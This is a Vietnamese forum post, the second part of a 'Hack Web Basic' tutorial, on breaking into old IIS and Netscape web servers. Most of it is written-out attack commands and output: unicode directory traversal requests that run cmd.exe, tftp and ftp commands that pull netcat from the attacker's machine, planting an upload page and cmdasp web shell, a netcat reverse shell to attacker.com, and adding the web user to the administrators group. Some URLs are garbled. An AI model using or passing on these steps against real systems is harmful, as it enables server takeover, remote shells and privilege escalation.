Hack Web Basic (phần 2)
Thứ 2 là tấn công chính IIS server :
Với IIS Directory Traversal: các kí tự unicode ,ví dụ như "%c0%af" ,"%c1%9c" biểu thị cho / và \.IIS sẽ decode chúng ( sau khi path checking hơn là trước đó).Do đó với request kiểu như sau ,một cmd tuỳ ý có thể được thực hiện trên server
GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+'c:\' HTTP /1.0
%c0%af được sử dụng như ../,ngoài ra còn có %c1%1c,
%c1%9c, %c1%1c,%c0%9v, %c0%af, %c0%qf, %c1%8s, %c1%9c,và %c1%pc.
http://victim.com/scripts/..%255c../winnt/.../c+dir+c:\url trên cho phép một attacker có thể truy cập vào cmd shell windows 2000.Nhớ rằng directory ảo khởi đầu trên request phải có đặc quyền thực hiện,như là kí tự unicode.Sau đây là kết quả trả về trên một server mắc lỗi:
victim.com [192.168.234.222] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 17 January 2001 15:26:28 GMT
Content-Type: application/octet-stream
Volume in drive C has no label.
Volume Serial Number is 6839-982F
Directory of c:\
03/26/2001 08:03p <DIR> Documents and Settings
02/28/2001 11:10p <DIR> Inetpub
04/16/2001 09:49a <DIR> Program Files
05/15/2001 12:20p <DIR> WINNT
0 File(s) 0 bytes
5 Dir(s) 390,264,832 bytes free
sent 73, rcvd 885: NOTSOCK
Download file sử dụng SMB,FTP hoặc TFTP
Download file sử dụng SMB,FTP hoặc TFTP
{còn tiếp}
Điều này thường yêu cầu được sự cho phép của firewall trên web server đích.Nếu firewall cho phép SMB(TCP 139 /445) thì attacker có thể lấy file trên hệ thống dựa vào tài khoản built-in của windows file sharing.
Nếu cho phép ftp ( tcp 21/20) hoặc tftp( udp 69) thì có thể upload file lên server từ một máy sử dụng ftp hoặc tftp server ,lên server sử dụng ftp/tftp client.
Ví dụ upload netcat sử dụng tftp.Đầu tiên hãy cài đặt tftp server trên máy mình.Sau đó chạy lệnh sau trên victim :
GET /script/..%c0%af..//winnt/system32/tftp.exe?"-i"+192.168.234.31+GET+nc.exe C:\nc.exe HTTP/1.0
ở đây 192.168.234.31 là local,ví dụ này chép netcat tới directory c:\ .Nếu c:\nc.exe đã tồn tại thì bạn sẽ nhận được thông báo lỗi đại loại như sau"tftp.exe: can't write to local file 'c:\nc.exe'".Một quá trình thành công phải thông báo dưới dạng một http 502 gateway error với một header message dạng như " transfer successful :59392 bytes in 1 second,59392 bytes/s."
Việc sử dụng ftp thì khó hơn song chính nó lại thường được cho phép từ phía server.Mục đích ở đây là sẽ tạo ra một file tuỳ ý ( ở đây sẽ là ftptmp làm ví dụ) trên hệ thống đích,và sau đó là sử dụng ftp client script chỉ dẫn cho ftp client này kết nối với máy của attacker và download netcat.Tuy nhiên trước khi tạo ra file này bạn cần tìm cách vượt qua một trở ngại.
Thật không may cho các quản trị viên trên thế giới rằng có thể dễ dàng đổi lại tên cmd.exe vượt qua sự ngăn cản này.Do vậy để tạo ra ftp client script của mình bạn phải tạo ra một cmd.exe đã rename:
GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe+c:\cmd1.exe HTTP/1.0
Hãy xem ví dụ:
GET/scripts/..%c0%af../cmd1.exe?+/c+echo+anonymous>C:\ftptmp&&echo+a@a.com>>C:\ftptm p&&echo+bin>>C:\ftptmp&&echo+get+test.txt+C:\nc.ex e>>C:\ftptmp&&echo+bye>>C:\ftptmp&&ftp+-s:C:\ftptmp+192.168.234.31&&del+C:\ftptmp
ở đây script filename=ftptmp,user-anonymous,password=a@a.com,ftp server ip address=192.168.234.31-là ip của bạn và chú ý là scipt được viết trên một dòng,ở đây là do chiều rộng cho phép của trang là giới hạn.
Sử dụng echo >file để tạo file:
Nếu ftp và tftp ko available trên server ( ví dụ như nó đã được remove trên server hoặc là bị chặn lại ở firewall) thì vẫn có những kĩ thuật ghi file lên server đích mà khôg cần sự giúp đỡ từ các client software.Như đã thấy ,việc sử dụng cmd1.exe -> echo/redirect dữ liệu tới một file là một phương pháp khá tốt.
Roelof Temmingh đã viết một perl script gọi là unicodeloader sử dụng sự khai thác unicode và kĩ thuật echo/redirect để tạo ra 2 file upload.asp và upload.inc -có thể đựoc sử dụng thông qua browser để upload mọi thứ khác nữa( nó bao gồm một script gọi là unicodexeecute với gói này,nhưng sẽ sử dụng cmdasp).
Việc sử dụng unicodeloader.pl,nó chưa được patch trong service pack 2.Đầu tiên hãy chắc rằng upload.asp và upload.inc là ở trong cùng mọt thư mục mà từ đó unicodeloader được gọi.Sau đó định danh thư mục cho phép ghi và chạy dưới webroot của server đích.Như ví dụ dưới sử dụng C:\inetpub\scripts ,cho phép ghi và chạy ( mặc định khi cài đặt windows 2000).
C:\ >unicodeloader.pl
Usage: unicodeloader IP:port webroot
C:\ >unicodeloader.pl victim.com:80 C:\inetpub\scripts
Creating uploading webpage on victim.com on port 80.
The webroot is C:\inetpub\scripts.
testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: c:\inetpub\scripts
'-au' is not recognized as an internal or external command,
operable program or batch file.
sensepost.exe found on system
uploading ASP section:
..............
uploading the INC section: (this may take a while)
.................................................. .........................
upload page created.
Now simply surf to caesars/upload.asp and enjoy.
Files will be uploaded to C:\inetpub\scripts
Ok,ta sẽ xem nó làm việc thế nào.Đầu tiên unicodeloader.pl copy C:\winnt\system32\cmd.exe thành một file tên là sensepost.exe trên thư mục chỉ định như tham số web root ( hay nói cho dễ hiểu ở đây chính là c:\inetpub\scripts). Như đã nói nó được đổi tên để tránh sự vô hiệu hoá cmd.exe -> redirect (">") qua khai thác này.Sensepost.exe sau đó sử dụng để echo/redirect file upload.asp và upload.inc lần lượt vào web root directory ( ở đây là \inetpub\scripts).
Khi upload.asp và các file cần thiết đã ở trên server thì ta có thể sử dụng web browser để upload nhiều file hơn (xem hình vẽ)
user posted image
Để có thể đoạt quyền kiểm soát server ,attacker có lẽ sẽ upload 2 file khác ( sử dụng upload.asp script).File đầu tiên có lẽ là netcat.Chỉ một thời gian ngắn sau hacker Maceo viết cmdasp.Nó dựa trên script chạy lệnh sử dụng các khai thác Unicode từ trong web browser của attacker.Cmdasp có một giao diện đồ họa dễ dàng cho việc sử dụng và chạy các lệnh unicode,xem hình vẽ
user posted image
Chỉ việc đánh vào browser như sau
http://victim.com/scripts/upload.asphttp://victim.com/scripts/cmdasp.aspVới nc.exe đã upload và khả năng chạy lệnh của cmd.asp cho thấy một shell với hệ thống của attacker là không cần thiết nữa.Hãy bắt đầu lằng nghe bằng netcat trên hệ thống của attacker như sau:
C:\>nc -l -p 2002
Sau đó sử dụng cmdasp.asp để tạo ra một netcat shell bằng việc nhập vào lệnh sau vào form và ấn Run:
c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002
Và giờ đây hãy nhìn vào cửa sổ command của chúng ta,nơi mà đang chạy netcat listener trên cổng 2002 như hình vẽ
bạn sẽ thấy 1 shell lệnh được hiện ra.Ở đây đã chạy ipconfig trên remote shell để minh họa rằng máy victim là dual-homed
Leo thang đặc quyền trên iis:
Một vài khai thác leo thang đặc quyền tồn tại trên windows nt và 2000.Tuy nhiên rất nhiều trong số chúng yêu cầu các shell tương thích để có thể được gọi thành công.Một remote web session không được xem như một session tưong thích của windows,do vậy nên những khai thác này là không khả thi vớ web servic chỉ là có thể vươn tới thông qua một kẻ lừa đảo.
Trên iis 4 ,khai thác LPC port ( local procedure call) gọi là hk.exe không yêu cầu trạng thái tương thích,và có thể được khai thác thông qua directory traversal nếu hk.exe có thể được upload lên victim server.Hk sẽ run lệnh như một tài khoản đầy đủ quyền hạn trên window,cho phép kẻ lừa đảo dễ dang thêm tài khoản IURS hoặc là IWA vào nhóm administrator.Đây là lệnh mà intruder sẽ chạy thông qua unicode hoặc double decode:
hk net localgroup administrators IUSR_ machinename /add
Lỗ hổng này đã được patch trên iis 5 .
Việc leo thang đặc quyền trên iis theo như tôi biết thì chủ yếu dựa trên các kĩ thuật gọi là tiêm dll.Chẳng hạn với iis 5,nếu một attacker có thể upload hay là tìm được một ISAPIDLL dung để gọi RevertToSelf API đặt IUSR vào SYSTEM khi chạy nó.Nó hoạt động gần giống với unicodeloader.pl.Có thể khai thác để thoả hiệp hệ thống.
HỆ THỐNG SỬ DỤNG NETSCAPE ENTERPRISE SERVER:(NES)
Lỗi tràn bộ đệm trên nes 3.6 sp2 và nes fast track server 2.0.1.Với khoảng 4080 kí tự trở nên và shellcode:
GET /[ buffer][ shellcode] HTTP/1.0
Lệnh trong shellcode sẽ chạy như localsystem trên windows.
Lỗi tràn bộ đệm thứ 2 được khai thác bởi việc gửi một yêu cầu getproperties với buffer và shell code thích hợp.
GETPROPERTIES /[buffer] HTTP/1.0[shellcode]
Shell code này sẽ chạy trong ngữ cảnh system.Áp dụng trên nes enterprise server vs3.6 với sp7.
Khắc phục:năng cấp bản vá lỗi tại
http://enterprise.netscape.com hay tại
http://wwws.sun.com/software/download/Novell GroupWise Arbitrary File Access
Một ví dụ điển hình về serlet không an toàn,lỗ hổng này có thể có từ window2000 tới novel.Xem ví dụ sau:
http://victim.com/servlet/webacc?Use.../webacc.cfg%00 unixzdo(HCE)
Fri Nov 02, 2012 4:11 pm by esolutionvn
